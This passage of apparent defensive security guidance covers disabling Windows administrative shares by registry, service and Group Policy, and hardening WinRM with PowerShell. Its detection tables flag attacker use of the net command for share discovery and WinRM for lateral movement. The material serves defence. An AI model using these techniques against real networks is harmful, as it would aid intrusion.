overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Disabling administrative and hidden shares on servers, specifically including domain controllers, may significantly impact the operation and functionality of systems within a domain-based environment.</span></p> <span style="vertical-align: baseline;">Additionally, if PsExec is used in an environment, disabling the admin (</span><code style="vertical-align: baseline;">ADMIN$</code><span style="vertical-align: baseline;">) share can restrict the capability for this tool to be used to remotely interface with endpoints.</span></td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Registry Method</span></h5> <p><span style="vertical-align: baseline;">Using the registry, administrative and hidden shares can be disabled on endpoints (Figure 13 and Figure 14).</span></p> <h6><span style="vertical-align: baseline;">Workstations</span></h6></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters DWORD Name = "AutoShareWks" Value = "0"</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 13: Registry value disabling administrative shares on workstations</span></p></div> <div class="block-paragraph_advanced"><h6><span style="vertical-align: baseline;">Servers</span></h6></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters DWORD Name = "AutoShareServer" Value = "0"</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 14: Registry value disabling administrative shares on servers</span></p></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Service Method</span></h5> <p><span style="vertical-align: baseline;">By stopping the </span><span style="font-style: italic; vertical-align: baseline;">Server</span><span style="vertical-align: baseline;"> service on an endpoint, the ability to access any shares hosted on the endpoint will be disabled (Figure 15).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig15.max-1000x1000.png" alt="Server service properties"> </a> <figcaption class="article-image__caption "><p data-block-key="7xllt">Figure 15: Server service properties</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Group Policy Method</span></h5> <p><span style="vertical-align: baseline;">Using the MSS (Legacy) Group Policy template, administrative and hidden shares can be disabled on either a server or workstation via a GPO setting (Figure 16).</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MSS (Legacy) &gt; MSS (AutoShareServer)</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Disabled</span></p> </li> </ul> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MSS (Legacy) &gt; MSS (AutoShareWks)</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Disabled</span></p> </li> </ul> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig16.max-1000x1000.png" alt="Disabling Administrative And Hidden Shares via the MSS (Legacy) Group Policy Template"> </a> <figcaption class="article-image__caption "><p data-block-key="7xllt">Figure 16: Disabling administrative and hidden shares via the MSS (Legacy) Group Policy template</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for Accessing Administrative or Hidden Shares</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Network Discovery: Suspicious Usage of the Net Command</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1049/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1049 - System Network Connections Discovery</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1135/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1135 - Network Share Discovery</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for suspicious use of the </span><code style="vertical-align: baseline;">net</code><span style="vertical-align: baseline;"> command to enumerate systems and file shares within an environment.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 15: Detection opportunities for accessing administrative or hidden shares</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Hardening Windows Remote Management</span></h4> <p><span style="vertical-align: baseline;">Threat actors may leverage Windows Remote Management (WinRM) to laterally move throughout an environment. </span><strong style="vertical-align: baseline;">WinRM is enabled by default on all Windows Server operating systems (since Windows Server 2012 and above)</strong><span style="vertical-align: baseline;">, but disabled on all client operating systems (Windows 7 and Windows 10) and older server platforms (Windows Server 2008 R2).</span></p> <p><span style="vertical-align: baseline;">PowerShell remoting (PS remoting) is a native Windows remote command execution feature that is built on top of the WinRM protocol.</span></p> <p><span style="vertical-align: baseline;">Windows client (nonserver) operating system platforms where WinRM is disabled indicates that there is:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">No WinRM listener configured</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">No Windows firewall exception configured</span></p> </li> </ul> <p><span style="vertical-align: baseline;">By default, WinRM uses TCP/5985 and TCP/5986, which can be either disabled using the Windows Firewall or configured so that a specific subset of IP addresses can be authorized for connecting to endpoints using WinRM.</span></p> <p><span style="vertical-align: baseline;">WinRM and PowerShell remoting can be explicitly disabled on endpoint using either a PowerShell command (Figure 17) or specific GPO settings.</span></p> <h5><span style="vertical-align: baseline;">PowerShell</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Disable-PSRemoting -Force</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 17: PowerShell command to disable WinRM/PowerShell remoting on an endpoint</span></p></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Running </span><code style="vertical-align: baseline;">Disable-PSRemoting -Force</code><span style="vertical-align: baseline;"> does not prevent local users from creating PowerShell sessions on the local computer or for sessions destined for remote computers.</span></p> <p><span style="vertical-align: baseline;">After running the command, the message recorded in Figure 18 will be displayed. These steps provide additional hardening, but after running the </span><code style="vertical-align: baseline;">Disable-PSRemoting -Force</code><span style="vertical-align: baseline;"> command, PowerShell sessions destined for the target endpoint will not be successful.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig18.max-1000x1000.png" alt="Warning message after disabling PSRemoting"> </a> <figcaption class="article-image__caption "><p data-block-key="gwqyc">Figure 18: Warning message after disabling PSRemoting</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">To enforce the additional steps for disabling WinRM via PowerShell (Figure 19 through Figure 22):</span></p> <ol> <li><span style="vertical-align: baseline;">Stop and disable the </span><span style="font-style: italic; vertical-align: baseline;">WinRM</span><span style="vertical-align: baseline;"> service.<br/><br/></span> <pre class="language-plain"><code>Stop-Service WinRM -PassThruSet-Service WinRM -StartupType Disabled</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 19: PowerShell command to stop and disable the WinRM service</span></p> <span style="vertical-align: baseline;"><br/></span></li> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Disable the listener that accepts requests on any IP address.<br/><br/></span></span> <pre class="language-plain"><code>dir wsman:\localhost\listener Remove-Item -Path WSMan:\Localhost\listener\&lt;Listener name&gt;</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 20: PowerShell commands to delete a WSMan listener</span></p> <span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><br/></span></span></li> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Disable the firewall exceptions for WS-Management communications.<br/><br/></span></span> <pre class="language-plain"><code>Set-NetFirewallRule -DisplayName 'Windows Remote Management (HTTP-In)' -Enabled False </code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 21: PowerShell command to disable firewall exceptions for WinRM</span></p> <span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><br/></span></span></li> <li><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Restore the value of </span><code style="vertical-align: baseline;">the LocalAccountTokenFilterPolicy</code><span style="vertical-align: baseline;"> to 0, which restricts remote access to members of the Administrators group on the computer.<br/><br/></span></span></span> <pre class="language-plain"><code>Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system -Name LocalAccountTokenFilterPolicy -Value 0</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Figure 22: PowerShell command to configure the registry key for LocalAccountTokenFilterPolicy</span></span></span></span></p> </li> </ol></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Group Policy</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; Windows Components &gt; Windows Remote Management (WinRM) &gt; WinRM Service &gt; Allow remote server management through WinRM</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Disabled</span></p> </li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">If this setting is configured as </span><span style="font-style: italic; vertical-align: baseline;">Disabled</span><span style="vertical-align: baseline;">, the WinRM service will not respond to requests from a remote computer, regardless of whether any WinRM listeners are configured.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; Windows Components &gt; Windows Remote Shell &gt; Allow Remote Shell Access </span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"><span style="font-style: italic; vertical-align: baseline;"><span style="font-style: italic; vertical-align: baseline;">Disabled</span></span></li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">This policy setting will manage the configuration of remote access to all supported shells to execute scripts and commands.</span></p> <h4><span style="vertical-align: baseline;">Detection Opportunities for WinRM Usage</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div 